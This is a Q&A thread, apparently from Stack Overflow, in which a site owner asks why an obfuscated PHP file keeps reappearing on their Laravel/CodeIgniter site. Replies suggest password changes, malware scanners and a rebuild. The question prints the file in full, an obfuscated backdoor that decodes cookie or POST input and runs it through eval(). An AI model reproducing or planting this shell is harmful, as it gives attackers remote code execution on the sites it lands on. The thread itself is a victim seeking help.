# PHP file injection.. how to solve this?

Tags: php, laravel, codeigniter

there is always a file on my website that always being upload even though im not the one who upload it.

[This is the file](https://i.stack.imgur.com/2E990.png)

and this is the code when you open it.. any idea how to stop this?

```
<?php
1.$ilmtik[4] . $ilmtik[26] . $ilmtik[20] . $ilmtik[18] . $ilmtik[12] . $ilmtik[3] . $ilmtik[22] . $ilmtik1 . $ilmtik[5] . $ilmtik[14] . $ilmtik[28] . $ilmtik[5] . $ilmtik[30] . $ilmtik[30] . $ilmtik[4] . $ilmtik[26];
$kkunht[] = $ilmtik[24] . $ilmtik[13];
$kkunht[] = $ilmtik[0];
$kkunht[] = $ilmtik[26] . $ilmtik[17] . $ilmtik[27] . $ilmtik[21] . $ilmtik[32];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[23] . $ilmtik[16] . $ilmtik[3] . $ilmtik[2] . $ilmtik[3] . $ilmtik[6] . $ilmtik[32];
$kkunht[] = $ilmtik[3] . $ilmtik[29] . $ilmtik[2] . $ilmtik[8] . $ilmtik[17] . $ilmtik[12] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[27] . $ilmtik[22] . $ilmtik[10] . $ilmtik[32] . $ilmtik[16];
$kkunht[] = $ilmtik[6] . $ilmtik[16] . $ilmtik[16] . $ilmtik[6] . $ilmtik[25] . $ilmtik[23] . $ilmtik[34] . $ilmtik[3] . $ilmtik[16] . $ilmtik[33] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[8] . $ilmtik[3] . $ilmtik[21];
$kkunht[] = $ilmtik[2] . $ilmtik[6] . $ilmtik[26] . $ilmtik[15];

foreach($kkunht[7]($_COOKIE, $_POST) as $dfmafta => $ozyods) {
  function lawlvc($kkunht, $dfmafta, $fanykfj)
  {
    return $kkunht[6]($kkunht[4]($dfmafta . $kkunht[0], ($fanykfj / $kkunht8) + 1) , 0, $fanykfj);
  }

  function cuoen($kkunht, $soeasy)
  {
    return @$kkunht[9]($kkunht1, $soeasy);
  }

  function mktryk($kkunht, $soeasy)
  {
    $pcrtw = $kkunht3 % 3;
    if (!$pcrtw) {
      eval($soeasy1);
      exit();
    }
  }

  $ozyods = cuoen($kkunht, $ozyods);
  mktryk($kkunht, $kkunht[5]($kkunht[2], $ozyods ^ lawlvc($kkunht, $dfmafta, $kkunht8)));
}
```

could someone has an idea on this.. thank you :(

Comment: Change your passwords on your site?

Comment: i already did, it doesn't work.. :(

Comment: have you tried analyzing this file at https://www.virustotal.com/#/home/upload

Comment: There are two sets of passwords on Godaddy, the Master Godaddy password and the password for the site.  Did you confirm you changed the SITE passwords?

Answer (score 0):

there are numerous scanners that will check your site (for example, https://sitecheck.sucuri.net/).

to fix the problem, i would disable php, turn off http access, then ssh into the site and start cleaning up the malware.  changing your password isn't a bad idea, but it won't have much impact on a backdoor.

Comment: I already clean the site and still it does.. its like everyday.. i also change the password.. i think it is an injection.. but im not really sure.. i dont have any idea..

Comment: have you tried any scanners (such as the one mentioned above, although you can look around and find others) to see if they can detect the cause?

Comment: i did tried scanners, but unfortunately it cannot find the malware that causes this issue.. No malware detected by scan (Low Risk)
No injected spam detected (Low Risk)
No defacements detected (Low Risk)

Comment: i would rebuild the site from scratch.  install packages one at a time, make you have the latest security patches, and don't install any packages that have a questionable reputation.  you might even want to host it somewhere else.  what's the URL of your site?

Comment: we already did the rebuild of the site but still there is no effect.. the malware does not effect the design and functionality though, but when you add it on adwords.. the google wont allow due to it has a malware.. i keep deleting those file everyday and everyday it will come back.. i dont know what kind of malware is it.. i dont where it come from.. but when i look at the code i can see a session and post in there.. but i dont know what it means.. maybe it is a session hijack or cookie but im not really sure that why i need opinion if someone had an experience about this.

Comment: anyway the website is hosted on godaddy and its framework is laravel and the other is codeigniter